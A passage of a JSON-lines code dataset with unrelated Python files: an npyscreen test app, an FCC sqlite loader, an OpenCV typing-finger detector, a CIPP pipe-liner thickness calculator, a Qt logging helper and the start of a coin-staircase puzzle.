self.parent.value.get()\n self.parent.wMain.display()\n\nclass MyTextCommandBox(npyscreen.TextCommandBox):\n def __init__(self, screen, \n history=False, \n history_max=100, \n set_up_history_keys=True,\n *args, **keywords):\n super(MyTextCommandBox, self).__init__(screen, history=history, history_max=history_max, \n set_up_history_keys=set_up_history_keys, *args, **keywords)\n self.keypress_timeout = 5\n def set_up_handlers(self):\n super(MyTextCommandBox, self).set_up_handlers()\n self.keypress_timeout = 5\n def pass_control(self, command):\n self.parent.action_controller.process_control(command, weakref.proxy(self))\n def while_waiting(self):\n self.parent.while_waiting()\n\n\nclass FmSearchActive(npyscreen.FormMuttActiveTraditional):\n ACTION_CONTROLLER = ActionControllerSearch\n COMMAND_WIDGET_CLASS = MyTextCommandBox\n\nclass TestApp(npyscreen.NPSApp):\n def main(self):\n F = FmSearchActive()\n F.wStatus1.value = \"Status Line \"\n F.wStatus2.value = \"Second Status Line \"\n F.value.set_values([str(x) for x in range(500)])\n F.wMain.values = F.value.get()\n\n F.edit()\n\n\nif __name__ == \"__main__\":\n App = TestApp()\n App.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198173972","text":"import sqlite3\nfrom pyFCC.archive import parse_fccid\n\n# creates a sqlite database for use with grantee data\ndef create_grantee_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute(\"\"\"DROP TABLE IF EXISTS grantees\"\"\")\n conn.commit()\n\n c.execute('''CREATE TABLE grantees\n (grantee_code int PRIMARY KEY NOT NULL, \n grantee_name text,\n mailing_address text,\n po_box text,\n city text,\n state text,\n country text,\n zip_code text,\n contact_name text,\n date_received text)''')\n conn.commit()\n c.close()\n print(\"Grantee table created in FCC.db\")\n\ndef create_product_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (grantee_code int NOT NULL REFERENCES grantees(grantee_code), \n product_code text,\n url text,\n high_freq text,\n low_freq text,\n version text,\n UNIQUE(grantee_code, product_code, version))''') #version doesn't currently have anything\n conn.commit()\n c.close()\n print(\"Product table created in FCC.db\")\n\n# populates an existing database table with grantee data\ndef populate_grantees(granteeTest):\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT INTO grantees VALUES (?,?,?,?,?,?,?,?,?,?)', granteeTest)\n conn.commit()\n c.close()\n print(\"Grantee Table populated in FCC.db\")\n\n# populates an existing database table with product data\ndef populate_products(productsTest):\n productList = []\n for key, value in productsTest.items():\n for version, row in enumerate(value, 1):\n detail_url, ID, low, high = row\n appid, productid = parse_fccid(ID)\n row = (appid, productid, detail_url, high, low, version)\n productList.append(row)\n\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT OR IGNORE INTO products VALUES (?,?,?,?,?,?)', productList)\n conn.commit()\n c.close()\n print(\"Product Table populated in FCC.db\")\n\n","sub_path":"pyFCC/fccDB.py","file_name":"fccDB.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355046435","text":"# coding: UTF-8\r\n# keycode_microtime.csvから入力されたキーコードと入力時間keycのデータを読み込み、画像処理によりどの指で押されたかの情報を取得して付加し、keycode_microtime_finger.csvへ出力\r\nimport numpy as np\r\nimport cv2\r\nimport csv\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n# なんか謎のエラー https://stackoverflow.com/questions/21296475/python-dateutil-unicode-warning を防止\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n\r\nFPS = 30\r\nMOVIENAME = './IMG_0945.MOV'\r\n\r\nwhere_key = {}\r\nwhere_key['q'] = [295, 378]\r\nwhere_key['w'] = [420, 380]\r\nwhere_key['e'] = [540, 382]\r\nwhere_key['r'] = [665, 385]\r\nwhere_key['t'] = [787, 386]\r\nwhere_key['y'] = [913, 388]\r\nwhere_key['u'] = [1040, 390]\r\nwhere_key['i'] = [1166, 392]\r\nwhere_key['o'] = [1294, 396]\r\nwhere_key['p'] = [1423, 397]\r\nwhere_key['a'] = [340, 487]\r\nwhere_key['s'] = [458, 489]\r\nwhere_key['d'] = [578, 490]\r\nwhere_key['f'] = [696, 494]\r\nwhere_key['g'] = [818, 497]\r\nwhere_key['h'] = [939, 500]\r\nwhere_key['j'] = [1062, 502]\r\nwhere_key['k'] = [1186, 506]\r\nwhere_key['l'] = [1310, 508]\r\nwhere_key['z'] = [415, 595]\r\nwhere_key['x'] = [530, 594]\r\nwhere_key['c'] = [647, 597]\r\nwhere_key['v'] = [765, 602]\r\nwhere_key['b'] = [882, 604]\r\nwhere_key['n'] = [999, 607]\r\nwhere_key['m'] = [1119, 610]\r\n\r\nneiborhood8 = np.array([\r\n [1, 1, 1],\r\n [1, 1, 1],\r\n [1, 1, 1]],\r\n np.uint8)\r\n\r\ndef erode(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=30)\r\n return img_erosion\r\n \r\ndef erode2(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=15)\r\n return img_erosion\r\n \r\ndef dilate(img):\r\n img_dilation = cv2.dilate(img, neiborhood8, iterations=10)\r\n return img_dilation\r\n\r\ndef color(img, color):\r\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hsv形式\r\n # 取得する色の範囲を指定\r\n # color: blue, pink, green\r\n if color == 'blue':\r\n lower = np.array([80, 80, 70])\r\n upper = np.array([116, 255, 255])\r\n elif color == 'green':\r\n lower = np.array([20, 40, 30])\r\n upper = np.array([90, 255, 255])\r\n\r\n # 指定した色に基づいたマスクの生成\r\n img_mask = cv2.inRange(hsv_img, lower, upper)\r\n # 画像とマスクの共通の領域を抽出\r\n return cv2.bitwise_and(img, img, mask=img_mask)\r\n\r\ndef map_cog(src, img):\r\n thresh = 30\r\n\r\n binary = cv2.threshold(cv2.cvtColor(src, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n n, label, contours, cogs = cv2.connectedComponentsWithStats(binary)\r\n print(n)\r\n\r\n # 重心\r\n cog_positions = []\r\n for i in range(n):\r\n # skip overall cog\r\n if i==0:\r\n continue\r\n\r\n cog_pos = [int(cogs[i][0]), int(cogs[i][1])]\r\n cog_positions.append(cog_pos)\r\n img = cv2.circle(img, (int(cogs[i][0]), int(cogs[i][1])), 10, (0, 0, 255), -1)\r\n return cog_positions\r\n\r\ndef dst_double(src, dst):\r\n return math.sqrt((dst[0] - src[0])**2 + (dst[1] - src[1])**2)\r\n\r\n# 画像フレームから運指を取得\r\ndef get_finger_id(arg_keycode, arg_frame):\r\n # タイミングに応じてframeをcaptureしてimread\r\n if chr(arg_keycode) == ' ':\r\n return 4\r\n img = arg_frame\r\n height = img.shape[0]\r\n width = img.shape[1]\r\n cv2.rectangle(img, (int(width), int(height/3)), (width-1, height-1), (255, 255, 255), -1)\r\n\r\n target_key_position = [where_key[chr(arg_keycode)][0], where_key[chr(arg_keycode)][1]] # test\r\n\r\n\r\n # img = cv2.circle(img, (50, 200), 20, (0, 0, 255), -1)\r\n\r\n blue_part_pre = color(img, 'blue')\r\n green_part_pre = color(img, 'green')\r\n cv2.namedWindow(\"blue_part_hsv\")\r\n cv2.imshow(\"blue_part_hsv\", blue_part_pre)\r\n # cv2.resizeWindow('blue_part_hsv', 1280, 720)\r\n cv2.namedWindow(\"green_part_hsv\")\r\n cv2.imshow(\"green_part_hsv\", green_part_pre)\r\n # cv2.resizeWindow('green_part_hsv', 1280, 720)\r\n\r\n blue_part = erode(color(img, 'blue'))\r\n blue_part = dilate(blue_part)\r\n green_part = erode2(color(img, 'green'))\r\n\r\n #cv2.rectangle(green_part, (width, height/4), (width-1, height-1), (0, 0, 0), -1)\r\n\r\n # 重心をもとに各指の位置同定\r\n blue_cog_positions = np.sort(map_cog(blue_part, img), axis=0)\r\n green_cog_positions = np.sort(map_cog(green_part, img), axis=0)\r\n print(blue_cog_positions)\r\n print(green_cog_positions)\r\n\r\n thresh = 30\r\n\r\n binary_blue = cv2.threshold(cv2.cvtColor(blue_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_blue = cv2.bitwise_not(blue_part)\r\n cv2.namedWindow(\"binary_blue\")\r\n \r\n cv2.imshow(\"binary_blue\", binary_blue)\r\n # cv2.resizeWindow('binary_blue', 1280, 720)\r\n\r\n binary_green = cv2.threshold(cv2.cvtColor(green_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_green = cv2.bitwise_not(green_part)\r\n cv2.namedWindow(\"binary_green\")\r\n \r\n cv2.imshow(\"binary_green\", binary_green)\r\n # cv2.resizeWindow('binary_green', 1280, 720)\r\n\r\n # さらにそのタイミングでのキー位置を取得\r\n\r\n # graphic\r\n WINDOW_1 = \"erode30_blue\"\r\n WINDOW_2 = \"erode15_green\"\r\n WINDOW_3 = \"detect\"\r\n #WINDOW_4 = \"4\"\r\n #WINDOW_5 = \"5\"\r\n cv2.namedWindow(WINDOW_1)\r\n cv2.namedWindow(WINDOW_2)\r\n cv2.namedWindow(WINDOW_3)\r\n #cv2.namedWindow(WINDOW_4)\r\n #cv2.namedWindow(WINDOW_5)\r\n \r\n cv2.imshow(WINDOW_1, blue_part)\r\n cv2.imshow(WINDOW_2, green_part)\r\n cv2.imshow(WINDOW_3, img)\r\n # cv2.resizeWindow(WINDOW_1, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_2, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_3, 1280, 720)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n # 適切なキーに最も近い指を確定\r\n if blue_cog_positions.shape[0] != 4 or green_cog_positions.shape[0] != 4:\r\n return -1\r\n\r\n r_ko = blue_cog_positions[0]\r\n r_ks = green_cog_positions[0]\r\n r_na = blue_cog_positions[1]\r\n r_hi = green_cog_positions[1]\r\n l_hi = blue_cog_positions[2]\r\n l_na = green_cog_positions[2]\r\n l_ks = blue_cog_positions[3]\r\n l_ko = green_cog_positions[3]\r\n\r\n arr = np.array([dst_double(r_ko, target_key_position),\r\n dst_double(r_ks, target_key_position),\r\n dst_double(r_na, target_key_position),\r\n dst_double(r_hi, target_key_position),\r\n 9999999.9,\r\n 9999999.9,\r\n dst_double(l_hi, target_key_position),\r\n dst_double(l_na, target_key_position),\r\n dst_double(l_ks, target_key_position),\r\n dst_double(l_ko, target_key_position)])\r\n\r\n print(arr)\r\n print(arr.argmin())\r\n\r\n\r\n\r\n return arr.argmin()\r\n\r\n# csvファイルハンドラ\r\nfr = open('douga_keycode_microtime.csv', 'rb')\r\nfw = open('keycode_microtime_finger.csv', 'w')\r\ndataReader = csv.reader(fr)\r\ndataWriter = csv.writer(fw, lineterminator='\\n')\r\n\r\n# キーコードと入力時間のデータを格納する辞書の配列\r\nkeycode_microtimes = []\r\nfor (i, row) in enumerate(dataReader):\r\n keycode_microtimes.append({})\r\n keycode_microtimes[i]['keycode'] = int(row[0])\r\n keycode_microtimes[i]['microtime'] = int(row[1])\r\n keycode_microtimes[i]['isCorrect'] = int(row[2])\r\n\r\n\r\n# strを数値形式にする & 入力時間をフレームに変��\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['keycode'] = keycode_microtime['keycode']\r\n keycode_microtime['frame'] = int(round(float(keycode_microtime['microtime']) / 1000000.0 * FPS))\r\n\r\n#### ここから、動画の入力開始位置合わせ (usage: 入力開始位置フレームでqを押す。 入力開始位置フレームじゃない時はq以外を押すと次のフレームへ移動する。)\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n# cv2.resizeWindow('image', 1280, 720)\r\n\r\nframecount = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n # 画面にフレームを表示\r\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n \r\n\r\n cv2.imshow('image', frame)\r\n # cv2.resizeWindow('image', 1280, 720)\r\n \r\n # qが押されたら抜ける(入力開始位置)、q以外を押すと次のフレームへ\r\n inputkeycode = cv2.waitKey(0)\r\n if inputkeycode == 113:\r\n break\r\n \r\n framecount += 1\r\n\r\n# 入力開始位置分だけフレーム数をオフセット\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['frame'] += framecount\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()\r\n\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n#### ここから、入力に対応する画像フレームから画像処理で運指情報を抜き出し\r\nframecount = 0\r\n# 今何個目のキー入力まで運指情報取得が終わったか\r\nkeycode_microtimes_count = 0\r\nbreakflag = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n while keycode_microtimes_count < len(keycode_microtimes) and framecount == keycode_microtimes[keycode_microtimes_count]['frame'] :\r\n # 画像処理して運指を取得\r\n keycode_microtimes[keycode_microtimes_count]['finger_id'] = get_finger_id(keycode_microtimes[keycode_microtimes_count]['keycode'], frame)\r\n windowname = chr(keycode_microtimes[keycode_microtimes_count]['keycode'])\r\n # cv2.namedWindow(windowname, cv2.WINDOW_NORMAL)\r\n # cv2.resizeWindow(windowname, 1280, 720)\r\n # cv2.imshow(windowname, frame)\r\n # inputkeycode = cv2.waitKey(0)\r\n # if inputkeycode == 27:\r\n # breakflag = 1\r\n # break\r\n # cv2.destroyAllWindows()\r\n keycode_microtimes_count += 1\r\n if breakflag == 1:\r\n break\r\n framecount += 1\r\n \r\n\r\n#### CSVへ書き出し\r\nfor i in xrange(0, len(keycode_microtimes)): \r\n csv_writerow = []\r\n csv_writerow.append(keycode_microtimes[i]['keycode'])\r\n csv_writerow.append(keycode_microtimes[i]['microtime'])\r\n csv_writerow.append(keycode_microtimes[i]['isCorrect'])\r\n csv_writerow.append(keycode_microtimes[i]['frame'])\r\n csv_writerow.append(keycode_microtimes[i]['finger_id'])\r\n dataWriter.writerow(csv_writerow)\r\n\r\nfr.close()\r\nfw.close()\r\n \r\ncv2.destroyAllWindows()","sub_path":"TypeFingerDetector/TypeFingerDetector/Release/demo_imageProcessing.py","file_name":"demo_imageProcessing.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626611322","text":"from math import trunc, exp, pi\n\nclass LinerManager(object):\n '''Instances of the LinerManager class take a dictionary of keys and\n values and determine the thickness of the CIPP liner'''\n # Standard live load table for AASHTO H20 highway loads,# Cooper E-80\n # rail, or 180 kip airplane gear load. Impact factors have already been\n # integrated.\n live_load_hwy = {\n 2:5.56, 3:4.17, 4:2.78, 5:1.74, 6:1.39, 7:1.22, 8:0.69\n }\n live_load_rail = {\n 2:26.39, 3:23.61, 4:18.4, 5:16.67, 6:15.63, 7:12.15,\n 8: 11.11, 10:7.64, 12:5.56, 14:4.17, 16:3.47, 18:2.78,\n 20:2.08, 22:1.91, 24:1.74, 26:1.39, 28:1.04, 30:0.69\n }\n live_load_arpt = {\n 2:13.14, 3:12.28, 4:11.27, 5:10.09, 6:8.79, 7:7.85,\n 8:6.93, 10:6.09, 12:4.76, 14:3.06, 16:2.29, 18:1.91,\n 20:1.53, 22:1.14, 24:1.05\n }\n \n def __init__(self, vardict):\n # The enhancement_factor and soil_mod are submitted exclusivly with\n # the dictionary. The following if statements prevent key failures\n if 'enhancement_factor' not in vardict:\n vardict['enhancement_factor'] = ''\n if 'soil_mod' not in vardict:\n vardict['soil_mod'] = ''\n \n # If value is left blank, assume default (ASTM)\n\n default_values = {\n 'design_modulus':250000, 'design_flexural_strength':4500,\n 'safety_factor':2.0, 'ret_factor':50, 'ovality':3.0,\n 'enhancement_factor':7.0, 'gw_level':0.0, 'soil_density':140,\n 'poissons':0.3, 'soil_mod':700, 'n_host':0.013, 'n_liner':0.010,\n 'host_age':50\n }\n \n for key, value in vardict.items():\n if vardict[key] == '':\n vardict[key] = default_values[key]\n \n #tempvardict = {}\n \n #for key, value in vardict.items():\n #tempvardict['self.'+key] = vardict[key]\n \n #vardict = tempvardict\n \n for key, value in vardict.items():\n try:\n float(vardict[key])\n vardict[key] = float(vardict[key])\n except:\n vardict[key] = vardict[key]\n \n self.vardict = vardict\n \n # Calculated variables\n self.vardict['soil_depth'] = (vardict['surface_to_invert']\n -(vardict['host_diameter'])/12)\n self.vardict['gw_head'] = (vardict['surface_to_invert']\n - vardict['gw_level'])\n if self.vardict['gw_head'] <= 0:\n self.vardict['gw_head'] = 0\n self.vardict['ov_red_fact'] = (((1-(vardict['ovality']/100))/((1+(\n vardict['ovality']/100))**2))**3)\n self.vardict['lng_term_modulus'] = ((vardict['ret_factor']/100)\n *vardict['design_modulus'])\n self.vardict['lng_term_flex_strength'] = (\n (vardict['ret_factor']/100)\n *vardict['design_flexural_strength'])\n self.vardict['gw_load'] = self.vardict['gw_head']/2.31\n\n \n def x1p1(self):\n '''X1.1 - Partially deteriorated gravity pipe condition support\n hydraulic load of groundwater'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n ef = self.vardict['enhancement_factor']\n mod = self.vardict['lng_term_modulus']\n oval = self.vardict['ov_red_fact']\n mu = self.vardict['poissons']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n sdr = (((2*ef*mod*oval)/((1-(mu**2))*gwload*FS))**(1.0/3.0))\n liner_thickness_x1p1 = dia/sdr\n return liner_thickness_x1p1\n\n def x1p2(self):\n '''X1.2 - If there is no groundwater above the pipe, the CIPP should \n have a maximum SDR of 100'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n gwhead = self.vardict['gw_head']\n \n # Calculate\n if (gwhead <= 0):\n liner_thickness_x1p2 = dia/100\n return liner_thickness_x1p2\n else:\n return 0\n\n def x1p2p1p1(self):\n '''X1.2.1.1 - if the original pipe is oval, the design from X1.1 shall\n have a minimum thickness as calculated by:'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n oval = self.vardict['ov_red_fact']\n flex = self.vardict['lng_term_flex_strength']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n pythag_A = (1.5*(oval/100))*(1+(oval/100))\n pythag_B = (-0.5*(1+((oval/100))))\n pythag_C = -flex/(gwload*FS)\n root_1 = (-pythag_B+((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n root_2 = (-pythag_B-((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n if (root_1 < 0):\n root_1 = 999\n if (root_2 < 0):\n root_2 = 999\n root = min(root_1, root_2)\n liner_thickness_x1p2p1p1 = dia/root\n return liner_thickness_x1p2p1p1\n\n \n\n \"\"\" For non-standard live loads, or concentrated load, use eq. and impact factors.\n Load eq.\n Pp = 3*Ps / 2*pi*(C^2)*((1+((d/c)^2))^2.5)\n Pp = pressure transmitted to pipe\n Ps = Load at surface (lbs)\n C = depth of cover (in for psi, ft for psf)\n d = horiz. offset distance from pipe to line of application of surface load (in for psi, ft for psf)\n\n #Impact factor - if less than x, y. If over x>3 use y4.\n imp_fact_hwy = { 1:1.5, 2:1.35, 3:1.15, 100:1.0 }\n imp_fact_rail = { 1:1.75, 2:1.5, 3:1.5, 100:1.35 }\n imp_fact_arpt = { 1:1.5, 2:1.35, 3:1.35, 100:1.15 }\n\n # Triggers for specialized investigation if load area > 10 sq ft and:\n # 500 psf for pre-1941 pipelines\n # 1000 psf for 12-inch diameter or larger\n # 1500 psf for pipelines smaller than 12-inch dia\n \"\"\"\n\n def live_load_determination(self):\n ''' X1.2.2 - Fully deteriorated gravity pipe. Designed to support hydraulic, soil, and live loads.\n Live load calculation method must be determined\n Standard using AASHTO charts'''\n # Pull variables from dictionary\n location = self.vardict['location']\n depth = self.vardict['soil_depth']\n\n # Determine Live Load\n if (location == 'Highway'):\n if (depth >= 10):\n live_load = 0\n elif (depth >8 and depth < 10):\n live_load = 0.69\n elif (depth < 2):\n live_load = 5.56\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_hwy[live_load_index]\n elif (location == 'Rail'):\n if (depth > 30):\n live_load = 0\n elif (depth >8 and depth <= 30):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_rail[live_load_index]\n elif (depth < 2):\n live_load = 26.39\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_rail[live_load_index]\n elif (location == 'Airport'):\n if (depth > 24):\n live_load = 0\n elif (depth >8 and depth <= 24):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_arpt[live_load_index]\n elif (depth < 2):\n live_load = 13.14\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_arpt[live_load_index]\n else:\n live_load = None\n return live_load\n\n def x1p2p2(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n gwhead = self.vardict['gw_head']\n depth = self.vardict['soil_depth']\n W = self.vardict['soil_density']\n FS = self.vardict['safety_factor']\n smod = self.vardict['soil_mod']\n oval = self.vardict['ov_red_fact']\n mod = self.vardict['lng_term_modulus']\n \n # Calculate\n adjusted_gwhead = gwhead - (dia/12)\n Rw_calc = 1.0-(0.33*(adjusted_gwhead/depth))\n Rw_min = 0.67\n Rw_max = 1.0\n Rw = min(Rw_calc, Rw_min)\n Rw = Rw_max if Rw > Rw_max else Rw #Water buoyancy factor\n Qt = ((0.433*adjusted_gwhead)+((W*depth*Rw)/144)\n +self.live_load_determination())\n B_prime = 1/(1+(4*(exp(-0.065*depth)))) #Coef of elastic support\n mom_inert = ((dia**3)*((FS*Qt)**2))/(32*Rw*B_prime*smod*oval*mod)\n liner_thickness_x1p2p2 = (12*mom_inert)**(1/3)\n return liner_thickness_x1p2p2\n\n def x1p2p2p1(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n des_mod = self.vardict['design_modulus']\n \n # Calculate\n mom_inert_min = (0.093*(dia**3))/des_mod\n liner_thickness_x1p2p2p1 = (12.0*mom_inert_min)**(1/3)\n return liner_thickness_x1p2p2p1 \n \n def thickness_formater(self): #formatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n thickness = self.thickness_calc()\n \n # Format\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n liner_thickness = 'No hydraulic loading, design as fully deteriorated or use minimum thickness.'\n else:\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n else:\n liner_thickness = 'error'\n \n return liner_thickness\n \n def thickness_calc(self): #unformatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n\n # Calculate\n if (condition == 'Partially Deteriorated'):\n if gwload <= 0:\n liner_thickness = 0\n else:\n liner_thickness = max(self.x1p1(), self.x1p2(), self.x1p2p1p1()) #output is in inches\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = max(self.x1p2p2(), self.x1p2p2p1()) #output is in inches\n\n return liner_thickness\n \n def flow_change(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n liner_t = self.thickness_calc()\n n_host = self.vardict['n_host']\n n_liner = self.vardict['n_liner']\n gwload = self.vardict['gw_load']\n condition = self.vardict['design_condition']\n \n #Calculate\n coeff = 0.608173 #For flow at pipe 2/3 full (design flow level)\n r_host = dia/2\n r_lined = (dia/2)-liner_t\n # First check if liner thickness reduces diameter to zero\n if r_lined <= 0:\n return -100\n else:\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n deltaQ_pct = 0.0\n return deltaQ_pct\n else:\n A_host = ((pi*r_host**2)*coeff)+(r_host/3)*((((r_host)**2)-((r_host/3)**2))**(0.5))\n pw_host = (2*pi*r_host)*coeff\n A_lined = ((pi*r_lined**2)*coeff)+(r_lined/3)*((((r_lined)**2)-((r_lined/3)**2))**(0.5))\n pw_lined = (2*pi*r_lined)*coeff\n slope = 0.102\n hyd_rad_host = A_host/pw_host\n hyd_rad_lined = A_lined/pw_lined\n q_host = (1.486/n_host)*A_host*(hyd_rad_host**(2/3))*(slope**(1/2))\n q_lined = (1.486/n_liner)*A_lined*(hyd_rad_lined**(2/3))*(slope**(1/2))\n deltaQ = q_lined - q_host\n deltaQ_pct = round((deltaQ/q_host) * 100)\n return deltaQ_pct\n \n def output_dict(self):\n # Convert input variables to nice format\n round_down_to0 = [\n 'design_modulus', 'design_flexural_strength', 'ret_factor',\n 'soil_density', 'soil_mod', 'host_age', 'host_diameter'\n ]\n round_down_to1 = [\n 'safety_factor', 'ovality', 'enhancement_factor', 'gw_level'\n ]\n round_down_to2 = ['poissons']\n round_down_to3 = ['n_host', 'n_liner']\n \n for i in round_down_to0:\n self.vardict[i] = round(self.vardict[i])\n for i in round_down_to1:\n self.vardict[i] = str('{0:.1f}'.format(round(self.vardict[i],1)))\n for i in round_down_to2:\n self.vardict[i] = str('{0:.2f}'.format(round(self.vardict[i],2)))\n for i in round_down_to3:\n self.vardict[i] = str('{0:.3f}'.format(round(self.vardict[i],3)))\n \n # Future - send out for calculations of flow reduction, add to dict\n \n return self.vardict\n\n \n\ndef LM_run(input):\n lm = LinerManager(input)\n thickness = lm.thickness_formater()\n flow_change = lm.flow_change()\n output_dict = lm.output_dict()\n return(thickness, flow_change, output_dict)\n\n\n","sub_path":"cippcalc.py","file_name":"cippcalc.py","file_ext":"py","file_size_in_byte":13351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55438545","text":"### some qt utils\n\n#from PyQt5 import QtCore\n#from PyQt5.QtCore import QThread, QDateTime\nfrom PyQt5.QtCore import *\n\ndef mygettid():\n ### simple gettid like C's syscall(__NR_gettid)\n import ctypes\n import platform\n\n syscalls = {\n 'i386': 224, # unistd_32.h: #define __NR_gettid 224\n 'x86_64': 186, # unistd_64.h: #define __NR_gettid 186\n }\n libcs = {\n 'i386': '/lib/libc.so.6',\n 'x86_64': '/lib64/libc.so.6',\n }\n # libc = ctypes.CDLL(\"/lib/libc.so.6\")\n libc = ctypes.CDLL(libcs[platform.machine()])\n # tid = ctypes.CDLL('libc.so.6').syscall(224)\n return libc.syscall(syscalls[platform.machine()])\n\n### in msgh: 0 aaaaaaaaa\ndef qt_debug_handler(tp, ctx, msg):\n #print(\"in msgh:\", tp, ctx, msg)\n #print(ctx.function, ctx.file, ctx.line)\n\n tid = QThread.currentThreadId() ### voidstr type\n tid = mygettid()\n tid = str(tid).encode('utf8')\n \n now = QDateTime.currentDateTime()\n tmstr = now.toString(\"yyyy-MM-dd hh:mm:ss\")\n tmstr = tmstr.encode('utf8')\n\n fn = b''\n try:\n if ctx.file is None: # for qt internal msg\n fn = b'qtinternal'\n else:\n fn = ctx.file.encode('utf-8')\n fnl = ctx.file.split('/')\n fn = fnl[len(fnl)-1].encode('utf8')\n except:\n fn = b'errfh'\n\n line = str(ctx.line).encode('utf8')\n function = b''\n try:\n if type(ctx.function) == str:\n function = ctx.function.encode('utf8')\n elif type(ctx.function) == bytes:\n # function = ctx.function.decode('utf8')\n function = ctx.function\n else: function = str(ctx.function).encode('utf8')\n except Exception as ex:\n # print(b'EEE:' + bytes(ctx.function, 'utf8'))\n print('EEE: ctx.function: %s' % str(ctx))\n\n if function == b'': function = b'qtinternal'\n # if ctx.function == None: function = b'qtinternal' # maybe UnicodeDecodeError:\n \n flog = b\"[\" + tmstr + b\"] T(\" + tid + b\") \" + fn + b\":\" + line + b\" \" + function \\\n + b\" -- \" + msg.encode('utf8')\n print(flog.decode('utf8'), flush=True)\n\n#usage\n# qInstallMessageHandler(qt_debug_handler)\n# qDebug('奇点'.encode()), but not qDebug('奇点')\n\n\n###\n### TODO improve qDebug() function\n### 多参数类型的qDebug\n### 并且能够用上qt的 debug handler\n### 不过这样不能正确获取调用栈信息了,还是不能用啊。\ndef qxDebug(*args):\n s = ''\n for arg in args:\n s += str(arg) + ' '\n qDebug(s)\n\n#####\nimport sys, time\nimport signal\n# from PyQt5.QtWidgets import qApp\nfrom PyQt5.QtCore import QCoreApplication\n\n### 必须与qt的timeout同时才能生效。\ndef sigint_handler(a0, a1):\n qApp = QCoreApplication.instance()\n print(\"SIGINT catched:\", a0, a1, qApp)\n qApp.quit()\n sys.exit(0)\n\ndef pytimeout():\n time.sleep(0.0000001)\n\nctrl_timer = None\ndef pyctrl():\n qInstallMessageHandler(qt_debug_handler)\n qApp = QCoreApplication.instance()\n ctrl_timer = QTimer(qApp)\n ctrl_timer.timeout.connect(pytimeout)\n ctrl_timer.start(100)\n \n signal.signal(signal.SIGINT, sigint_handler)\n \n","sub_path":"wxagent/qtutil.py","file_name":"qtutil.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88735956","text":"\"\"\"\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\nExample 2:\n\nn = 8\n\nThe coins can form 